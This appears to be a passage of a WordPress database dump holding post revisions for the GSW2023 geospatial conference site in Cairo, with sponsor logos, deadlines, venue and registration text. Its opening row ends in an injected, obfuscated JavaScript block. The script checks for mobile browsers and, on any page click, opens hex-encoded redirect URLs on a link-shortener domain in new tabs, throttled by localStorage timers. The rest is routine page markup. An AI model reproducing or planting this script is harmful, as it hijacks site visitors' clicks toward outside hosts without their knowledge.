_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 05:20:58','2023-05-17 05:20:58','',3066,'https://gsw2023.com/?p=4527',0,'revision','',0),
(4528,1,'2023-05-17 05:26:00','2023-05-17 05:26:00','[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\r\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\r\n[/vc_column_text][/vc_column_inner]\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #000080;\"><strong><a style=\"color: #000080;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue </a></strong></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\"><strong>(InterContinental Cairo Semiramis)</strong></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #000080;\"><strong><a style=\"color: #000080;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Special Rate Booking is Opened Now</a></strong></span></h4>\r\n&nbsp;\r\n<h3></h3>\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong>\r\n\r\n<strong><del>April 15, 2023</del> ,</strong>\r\n\r\n<strong> May 15, 2023  (hard deadline, no extension)</strong>\r\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong>\r\n\r\n<strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\r\n[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n&nbsp;\r\n<h3></h3>\r\n[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: 